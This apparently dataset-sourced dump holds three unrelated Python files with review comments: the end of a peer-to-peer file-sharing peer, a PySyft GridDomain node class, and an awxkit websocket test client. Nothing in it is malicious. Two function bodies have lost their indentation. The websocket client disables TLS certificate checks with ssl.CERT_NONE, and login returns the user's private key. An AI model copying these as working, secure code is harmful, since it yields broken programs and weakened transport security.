f.write(xor(self.dl_file(peers[i],i,save=False)))
def sendtopeer(self, peer, msg, wait=True):
    """Send a length-prefixed text message to `peer`.

    Args:
        peer: (host, port) address to connect to.
        msg: str payload; it is sent as a 4-byte length followed by bytes.
        wait: when True, read a length-prefixed reply and return its bytes;
            when False, just close the connection (returns None).
    """
    conn = self.create_client_sock()
    conn.connect(peer)
    conn.send(struct.pack('!L', len(msg)))
    conn.send(struct.pack('!{}s'.format(len(msg)), msg.encode()))
    if not wait:
        conn.close()
        return
    reply_len = struct.unpack('!L', conn.recv(4))[0]
    reply = conn.recv(reply_len)
    conn.close()
    return reply
def _sendlen(self,c,m):
c.send(struct.pack('!L',len(m)))
def randstr(self):
    """Return a short random identifier: the first UUID4 group (8 hex chars)."""
    return str(uuid.uuid4()).partition('-')[0]
def _peermsg(self, d, c):
    """Dispatch one decoded request dict `d` on the open connection `c`.

    Wire protocol: every reply is a 4-byte big-endian length prefix followed
    by the payload. Every branch closes `c` when finished; unknown message
    types are dropped silently.
    """
    mtype = d['type']
    if mtype == 'PING':
        # Liveness probe: answer with a fixed 4-byte 'PONG'.
        self._sendlen(c,'PONG')
        c.send(struct.pack('!4s','PONG'.encode()))
        c.close()
    elif mtype == 'PEERLIST':
        # Share our known peer addresses as the repr() of the list.
        m = str(self.peers)
        self._sendlen(c,m)
        l = len(m)
        c.send(struct.pack('!{}s'.format(l),m.encode()))
        c.close()
    elif mtype == 'FILEUP':
        # Chunk upload: length prefix, then raw bytes, stored under a
        # random 8-char name in the data directory.
        size = struct.unpack('!L',c.recv(4))[0]
        # NOTE(review): a single recv() may return fewer than `size` bytes
        # for large chunks — confirm against expected chunk sizes.
        with open(self.dataDir+self.randstr(),'wb') as f:
            f.write(c.recv(size))
        c.close()
    elif mtype == 'FILES':
        # Send our hash->name catalogue as the repr() of the dict; `l` is
        # the length of that repr as returned by getfilelist().
        l,m = self.getfilelist()
        self._sendlen(c,str(m))
        c.send(struct.pack('!{}s'.format(l),str(m).encode()))
        c.close()
    elif mtype == 'GET':
        # Stream back the file matching the requested hash, or 'NOTFOUND'.
        fname = d['hash']
        # Refresh the catalogue in case files changed on disk.
        self.files=self.getfilelist()[1]
        if fname in self.files:
            path = self.dataDir+self.files[fname]
            size = os.path.getsize(path)
            c.send(struct.pack('!L',size))
            with open(path,'rb') as f:
                b = f.read(size)
                c.send(b)
            c.close()
        else:
            self._sendlen(c,'NOTFOUND')
            c.send(struct.pack('!{}s'.format(len('NOTFOUND')), 'NOTFOUND'.encode()))
            c.close()
    else:
        # Unknown command: drop the connection without replying.
        c.close()
def _handle(self, conn):
msglen = struct.unpack('!L',conn.recv(4))[0]
if not msglen: return -1
msg = conn.recv(msglen)
data = struct.unpack('!{}s'.format(msglen),msg)[0].decode()
self._peermsg(ast.literal_eval(data),conn)
def mainloop(self):
    """Accept connections until shutdown; serve each on its own thread.

    A KeyboardInterrupt closes the listening socket and exits the process
    with status 1.
    """
    try:
        while not self._shutdown:
            conn, addr = self.socket.accept()
            print('[*] New connection from ' + str(addr))
            worker = threading.Thread(target=self._handle, args=(conn,))
            worker.start()
    except KeyboardInterrupt:
        self.socket.close()
        sys.exit(1)
def updatePeers(self, n):
    """Merge the iterable of peer addresses `n` into self.peers.

    Addresses already known are skipped. The list is mutated under
    self._lock; the `with` statement guarantees the lock is released even
    if an exception fires mid-update (the original acquire()/release() pair
    would deadlock future callers in that case).
    """
    with self._lock:
        for peer in n:
            if peer not in self.peers:
                self.peers.append(peer)
def request_file(self, filehash, name):
    """Fetch the file identified by `filehash` from the first peer that has it.

    Does nothing when the file is already present locally. Each known peer
    is probed with a GET request; a reply whose length prefix equals
    len('NOTFOUND') is treated as a miss and the next peer is tried.

    Args:
        filehash: content hash identifying the file.
        name: local file name to store the download under.
    """
    # Bug fix: getfilelist() returns (length, dict); the original assigned
    # the whole tuple, so the membership test below could never succeed.
    self.files = self.getfilelist()[1]
    if filehash in self.files:
        return
    req = str({'type': 'GET', 'hash': filehash})
    header = struct.pack('!L', len(req))
    # Bug fix: struct's 's' format needs bytes; the original passed the
    # unencoded str, which raises struct.error on Python 3.
    payload = struct.pack('!{}s'.format(len(req)), req.encode())
    notfound_len = len('NOTFOUND')
    for peer in self.peers:
        c = self.create_client_sock()
        c.connect(peer)
        c.send(header)
        c.send(payload)
        size = struct.unpack('!L', c.recv(4))[0]
        # Bug fix: the probe socket was leaked on the hit path.
        c.close()
        # NOTE(review): a real 8-byte file is indistinguishable from a
        # NOTFOUND reply under this length-only heuristic.
        if size == notfound_len:
            continue
        self.dl_file(peer, filehash, name=name)
        break
def dl_file(self, peer, filehash, name='', save=True):
    """Download the file identified by `filehash` from `peer`.

    Args:
        peer: (host, port) tuple to connect to.
        filehash: content hash the remote side looks the file up by.
        name: file name to store the payload under (only when save=True).
        save: when True write to self.dataDir + name and return None;
            when False return the raw payload bytes instead.
    """
    req = str({'type': 'GET', 'hash': filehash})
    c = self.create_client_sock()
    c.connect(peer)
    c.send(struct.pack('!L', len(req)))
    c.send(struct.pack('!{}s'.format(len(req)), req.encode()))
    size = struct.unpack('!L', c.recv(4))[0]
    try:
        data = c.recv(size)
    finally:
        # Bug fix: the save=False path returned without ever closing the
        # socket, leaking one descriptor per chunk downloaded.
        c.close()
    if save:
        with open(self.dataDir + name, 'wb') as f:
            f.write(data)
        return
    return data
def shutdown(self):
    """Signal mainloop() to stop accepting new connections."""
    self._shutdown = True
def run(self):
    """Thread entry point: delegate to the blocking accept loop."""
    self.mainloop()
if __name__ == '__main__':
    # Minimal interactive driver: start a peer on localhost:6000 with two
    # hard-coded neighbours, then loop on 'upload <path>' and
    # 'retrieve <hash> <dest>' commands until the user types 'quit'.
    try:
        p = Peer('127.0.0.1',6000)
        p.daemon = True
        p.start()
        p.peers=[('127.0.0.1',7000),('127.0.0.1',8000)]
        k=input('(blockr) ')
        while k != 'quit':
            if k.startswith('upload'):
                p.split_send_file(k.split(' ')[1])
            elif k.startswith('retrieve'):
                m = k.split(' ')
                p.recv_split_file(m[1],m[2])
            k = input('(blockr) ')
        sys.exit()
        # NOTE(review): this keep-alive loop is unreachable — sys.exit()
        # above always fires first.
        while True: time.sleep(100)
    except KeyboardInterrupt:
        print('Exiting...')
        sys.exit(1)
|
domain.py | # stdlib
from threading import Thread
from time import sleep
from typing import Dict
from typing import Optional
# third party
from flask import current_app as app
import jwt
from nacl.signing import SigningKey
from nacl.signing import VerifyKey
import syft as sy
from syft import serialize
from syft.core.common.message import SignedImmediateSyftMessageWithReply
from syft.core.common.message import SignedImmediateSyftMessageWithoutReply
from syft.core.io.location import Location
from syft.core.io.location import SpecificLocation
from syft.core.node.common.action.exception_action import ExceptionMessage
from syft.core.node.common.action.exception_action import UnknownPrivateException
from syft.core.node.common.service.auth import AuthorizationException
from syft.core.node.device.client import DeviceClient
from syft.core.node.domain.domain import Domain
from syft.grid.connections.http_connection import HTTPConnection
import tenseal as ts
# grid relative
from ..database import db
from ..database.store_disk import DiskObjectStore
from ..manager.association_request_manager import AssociationRequestManager
from ..manager.environment_manager import EnvironmentManager
from ..manager.group_manager import GroupManager
from ..manager.request_manager import RequestManager
from ..manager.role_manager import RoleManager
from ..manager.setup_manager import SetupManager
from ..manager.user_manager import UserManager
from ..services.association_request import AssociationRequestService
from ..services.dataset_service import DatasetManagerService
from ..services.group_service import GroupManagerService
from ..services.infra_service import DomainInfrastructureService
from ..services.request_service import RequestService
from ..services.role_service import RoleManagerService
from ..services.setup_service import SetUpService
from ..services.tensor_service import RegisterTensorService
from ..services.transfer_service import TransferObjectService
from ..services.user_service import UserManagerService
sy.load("tenseal")
class GridDomain(Domain):
    """PyGrid Domain node.

    Extends syft's ``Domain`` with database-backed managers (users, roles,
    groups, environments, requests, ...) and registers the grid-specific
    message services that form this node's API surface.
    """

    def __init__(
        self,
        name: Optional[str],
        network: Optional[Location] = None,
        domain: SpecificLocation = SpecificLocation(),
        device: Optional[Location] = None,
        vm: Optional[Location] = None,
        signing_key: Optional[SigningKey] = None,
        verify_key: Optional[VerifyKey] = None,
        root_key: Optional[VerifyKey] = None,
        db_path: Optional[str] = None,
    ):
        """Build the node, its DB managers and its service routing table.

        Parameters mirror syft's ``Domain``. ``root_key`` is accepted for
        call compatibility but is not forwarded to the parent class.
        NOTE(review): the ``SpecificLocation()`` default is evaluated once at
        class definition time and shared by all instances — confirm that is
        intended.
        """
        super().__init__(
            name=name,
            network=network,
            domain=domain,
            device=device,
            vm=vm,
            signing_key=signing_key,
            verify_key=verify_key,
            db_path=db_path,
        )

        # Database Management Instances
        self.users = UserManager(db)
        self.roles = RoleManager(db)
        self.groups = GroupManager(db)
        self.disk_store = DiskObjectStore(db)
        self.environments = EnvironmentManager(db)
        self.setup = SetupManager(db)
        self.association_requests = AssociationRequestManager(db)
        self.data_requests = RequestManager(db)
        self.env_clients = {}
        self.setup_configs = {}

        # Grid Domain Services: each appended class is instantiated and
        # routed by _register_services() below.
        self.immediate_services_with_reply.append(AssociationRequestService)
        self.immediate_services_with_reply.append(DomainInfrastructureService)
        self.immediate_services_with_reply.append(SetUpService)
        self.immediate_services_with_reply.append(RegisterTensorService)
        self.immediate_services_with_reply.append(RoleManagerService)
        self.immediate_services_with_reply.append(UserManagerService)
        self.immediate_services_with_reply.append(DatasetManagerService)
        self.immediate_services_with_reply.append(GroupManagerService)
        self.immediate_services_with_reply.append(TransferObjectService)
        self.immediate_services_with_reply.append(RequestService)
        self._register_services()
        self.__handlers_flag = True
        # thread = Thread(target=self.thread_run_handlers)
        # thread.start()

    def login(self, email: str, password: str) -> Dict:
        """Authenticate ``email``/``password`` and return client bootstrap data.

        Returns a dict with a JWT ``token``, the user's private ``key`` and
        the node ``metadata`` serialized into an ISO-8859-1 string.
        """
        user = self.users.login(email=email, password=password)
        token = jwt.encode({"id": user.id}, app.config["SECRET_KEY"])
        # NOTE(review): assumes PyJWT < 2.0, where encode() returns bytes;
        # on PyJWT >= 2.0 it returns str and this decode would raise.
        token = token.decode("UTF-8")
        return {
            "token": token,
            "key": user.private_key,
            "metadata": serialize(self.get_metadata_for_client())
            .SerializeToString()
            .decode("ISO-8859-1"),
        }

    def recv_immediate_msg_with_reply(
        self, msg: SignedImmediateSyftMessageWithReply, raise_exception=False
    ) -> SignedImmediateSyftMessageWithoutReply:
        """Process a signed message and return the signed reply.

        When ``raise_exception`` is False (the default), any exception from
        processing is converted into an ``ExceptionMessage`` reply so that
        long-lived transports (e.g. WebRTC loops) are not broken; only
        ``AuthorizationException`` details are exposed to the caller.
        """
        if raise_exception:
            response = self.process_message(
                msg=msg, router=self.immediate_msg_with_reply_router
            )
            # maybe I shouldn't have created process_message because it screws up
            # all the type inference.
            res_msg = response.sign(signing_key=self.signing_key)  # type: ignore
        else:
            # exceptions can be easily triggered which break any WebRTC loops
            # so we need to catch them here and respond with a special exception
            # message reply
            try:
                # try to process message
                response = self.process_message(
                    msg=msg, router=self.immediate_msg_with_reply_router
                )
            except Exception as e:
                public_exception: Exception
                if isinstance(e, AuthorizationException):
                    private_log_msg = "An AuthorizationException has been triggered"
                    public_exception = e
                else:
                    private_log_msg = f"An {type(e)} has been triggered"  # dont send
                    public_exception = UnknownPrivateException(
                        "UnknownPrivateException has been triggered."
                    )
                try:
                    # try printing a useful message
                    private_log_msg += f" by {type(msg.message)} "
                    private_log_msg += f"from {msg.message.reply_to}"  # type: ignore
                except Exception:
                    pass

                # send the public exception back
                response = ExceptionMessage(
                    address=msg.message.reply_to,  # type: ignore
                    msg_id_causing_exception=msg.message.id,
                    exception_type=type(public_exception),
                    exception_msg=str(public_exception),
                )
            # maybe I shouldn't have created process_message because it screws up
            # all the type inference.
            res_msg = response.sign(signing_key=self.signing_key)  # type: ignore
        # Removed: a dead `output` f-string (signing banner) that was built
        # here but never logged or returned.
        return res_msg
|
ws.py | import time
import threading
import logging
import atexit
import json
import ssl
from six.moves.queue import Queue, Empty
from six.moves.urllib.parse import urlparse
from awxkit.config import config
log = logging.getLogger(__name__)
class WSClientException(Exception):
    """Raised when the websocket channel connection cannot be established."""
# Channel event-type names used when building subscription payloads
# (see WSClient.subscribe / subscribe_to_pending_events below).
changed = 'changed'
limit_reached = 'limit_reached'
status_changed = 'status_changed'
summary = 'summary'
class WSClient(object):
    """Provides a basic means of testing pub/sub notifications with payloads similar to
    'groups': {'jobs': ['status_changed', 'summary'],
               'schedules': ['changed'],
               'ad_hoc_command_events': [ids...],
               'job_events': [ids...],
               'workflow_events': [ids...],
               'project_update_events': [ids...],
               'inventory_update_events': [ids...],
               'system_job_events': [ids...],
               'control': ['limit_reached']}

    e.x:
    ```
    ws = WSClient(token, port=8013, secure=False).connect()
    ws.job_details()
    ... # launch job
    job_messages = [msg for msg in ws]
    ws.ad_hoc_stdout()
    ... # launch ad hoc command
    ad_hoc_messages = [msg for msg in ws]
    ws.close()
    ```
    """

    # Subscription group types

    def __init__(self, token=None, hostname='', port=443, secure=True, session_id=None, csrftoken=None):
        """Prepare (but do not open) a websocket connection to AWX.

        Authentication uses either `token` or `session_id` (+ optional
        `csrftoken`), passed to the server as cookies. When `hostname` is
        empty, scheme/host/port are derived from config.base_url.
        """
        # delay this import, because this is an optional dependency
        import websocket

        if not hostname:
            result = urlparse(config.base_url)
            secure = result.scheme == 'https'
            port = result.port
            if port is None:
                port = 80
                if secure:
                    port = 443
            # should we be adding result.path here?
            hostname = result.hostname

        self.port = port
        self._use_ssl = secure
        self.hostname = hostname
        self.token = token
        self.session_id = session_id
        self.csrftoken = csrftoken
        # Incoming messages land here via _on_message and are drained by
        # _recv / __iter__.
        self._recv_queue = Queue()
        self._ws_closed = False
        # Set by _on_open; connect() waits on it to confirm the handshake.
        self._ws_connected_flag = threading.Event()
        if self.token is not None:
            auth_cookie = 'token="{0.token}";'.format(self)
        elif self.session_id is not None:
            auth_cookie = 'sessionid="{0.session_id}"'.format(self)
            if self.csrftoken:
                auth_cookie += ';csrftoken={0.csrftoken}'.format(self)
        else:
            auth_cookie = ''
        pref = 'wss://' if self._use_ssl else 'ws://'
        url = '{0}{1.hostname}:{1.port}/websocket/'.format(pref, self)
        self.ws = websocket.WebSocketApp(url,
                                         on_open=self._on_open,
                                         on_message=self._on_message,
                                         on_error=self._on_error,
                                         on_close=self._on_close,
                                         cookie=auth_cookie)
        self._message_cache = []
        # Either False, or a dict(jobs=..., events=...) describing a
        # deferred subscription to apply once a pending job id arrives.
        self._should_subscribe_to_pending_job = False

    def connect(self):
        """Open the websocket on a daemon thread; return self when connected.

        Raises:
            WSClientException: if the connection is not up within 20 seconds.
        """
        # NOTE(review): self.ws is passed into _ws_run_forever's `sockopt`
        # slot, which that method never uses; only the sslopt dict takes
        # effect (run_forever operates on self.ws anyway) — confirm intent.
        wst = threading.Thread(target=self._ws_run_forever, args=(self.ws, {"cert_reqs": ssl.CERT_NONE}))
        wst.daemon = True
        wst.start()
        atexit.register(self.close)
        if not self._ws_connected_flag.wait(20):
            raise WSClientException('Failed to establish channel connection w/ AWX.')
        return self

    def close(self):
        """Close the websocket unless the server already closed it."""
        log.info('close method was called, but ignoring')
        if not self._ws_closed:
            log.info('Closing websocket connection.')
            self.ws.close()

    def job_details(self, *job_ids):
        """subscribes to job status, summary, and, for the specified ids, job events"""
        self.subscribe(jobs=[status_changed, summary], job_events=list(job_ids))

    def pending_job_details(self):
        """subscribes to job status and summary, with responsive
        job event subscription for an id provided by AWX
        """
        self.subscribe_to_pending_events('job_events', [status_changed, summary])

    def status_changes(self):
        # Status-change notifications only; no per-job event streams.
        self.subscribe(jobs=[status_changed])

    def job_stdout(self, *job_ids):
        # Job status plus stdout-carrying job events for the given ids.
        self.subscribe(jobs=[status_changed], job_events=list(job_ids))

    def pending_job_stdout(self):
        # As job_stdout, but the job id is learned from a pending message.
        self.subscribe_to_pending_events('job_events')

    # mirror page behavior
    def ad_hoc_stdout(self, *ahc_ids):
        self.subscribe(jobs=[status_changed], ad_hoc_command_events=list(ahc_ids))

    def pending_ad_hoc_stdout(self):
        self.subscribe_to_pending_events('ad_hoc_command_events')

    def project_update_stdout(self, *project_update_ids):
        self.subscribe(jobs=[status_changed], project_update_events=list(project_update_ids))

    def pending_project_update_stdout(self):
        self.subscribe_to_pending_events('project_update_events')

    def inventory_update_stdout(self, *inventory_update_ids):
        self.subscribe(jobs=[status_changed], inventory_update_events=list(inventory_update_ids))

    def pending_inventory_update_stdout(self):
        self.subscribe_to_pending_events('inventory_update_events')

    def workflow_events(self, *wfjt_ids):
        self.subscribe(jobs=[status_changed], workflow_events=list(wfjt_ids))

    def pending_workflow_events(self):
        self.subscribe_to_pending_events('workflow_events')

    def system_job_events(self, *system_job_ids):
        self.subscribe(jobs=[status_changed], system_job_events=list(system_job_ids))

    def pending_system_job_events(self):
        self.subscribe_to_pending_events('system_job_events')

    def subscribe_to_pending_events(self, events, jobs=[status_changed]):
        # Remember the desired event group; _on_message upgrades the
        # subscription once a matching 'pending' job announces its id.
        # NOTE(review): mutable default argument — harmless here since it is
        # never mutated, but worth confirming.
        self._should_subscribe_to_pending_job = dict(jobs=jobs, events=events)
        self.subscribe(jobs=jobs)

    # mirror page behavior
    def jobs_list(self):
        self.subscribe(jobs=[status_changed, summary], schedules=[changed])

    # mirror page behavior
    def dashboard(self):
        self.subscribe(jobs=[status_changed])

    def subscribe(self, **groups):
        """Sends a subscription request for the specified channel groups.
        ```
        ws.subscribe(jobs=[ws.status_changed, ws.summary],
                     job_events=[1,2,3])
        ```
        """
        self._subscribe(groups=groups)

    def _subscribe(self, **payload):
        # NOTE(review): the key is literally 'xrftoken' (not 'csrftoken') —
        # it is part of the wire protocol, so it must stay spelled this way.
        payload['xrftoken'] = self.csrftoken
        self._send(json.dumps(payload))

    def unsubscribe(self):
        self._send(json.dumps(dict(groups={}, xrftoken=self.csrftoken)))
        # it takes time for the unsubscribe event to be recieved and consumed and for
        # messages to stop being put on the queue for daphne to send to us
        time.sleep(5)

    def _on_message(self, message):
        """Websocket callback: queue the message, upgrading a deferred
        subscription when a pending job's id becomes known."""
        message = json.loads(message)
        log.debug('received message: {}'.format(message))

        if all([message.get('group_name') == 'jobs',
                message.get('status') == 'pending',
                message.get('unified_job_id'),
                self._should_subscribe_to_pending_job]):
            # Only upgrade when the message's project-ness matches the kind
            # of events we deferred (project updates carry a project_id).
            if bool(message.get('project_id')) == (
                    self._should_subscribe_to_pending_job['events'] == 'project_update_events'):
                self._update_subscription(message['unified_job_id'])

        return self._recv_queue.put(message)

    def _update_subscription(self, job_id):
        # Re-subscribe with the deferred event group bound to the now-known
        # job id, then clear the deferred marker.
        subscription = dict(jobs=self._should_subscribe_to_pending_job['jobs'])
        events = self._should_subscribe_to_pending_job['events']
        subscription[events] = [job_id]
        self.subscribe(**subscription)
        self._should_subscribe_to_pending_job = False

    def _on_open(self):
        # Unblocks connect().
        self._ws_connected_flag.set()

    def _on_error(self, error):
        log.info('Error received: {}'.format(error))

    def _on_close(self):
        log.info('Successfully closed ws.')
        self._ws_closed = True

    def _ws_run_forever(self, sockopt=None, sslopt=None):
        # NOTE(review): `sockopt` is accepted but unused; connect() passes
        # self.ws through it (see note there).
        self.ws.run_forever(sslopt=sslopt)
        log.debug('ws.run_forever finished')

    def _recv(self, wait=False, timeout=10):
        """Pop one queued message, or None if the queue stays empty.

        `wait` and `timeout` map positionally onto Queue.get(block, timeout);
        with the default wait=False the timeout is effectively ignored.
        """
        try:
            msg = self._recv_queue.get(wait, timeout)
        except Empty:
            return None
        return msg

    def _send(self, data):
        self.ws.send(data)
        log.debug('successfully sent {}'.format(data))

    def __iter__(self):
        # Drain currently queued messages; stops at the first empty read.
        while True:
            val = self._recv()
            if not val:
                return
            yield val
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.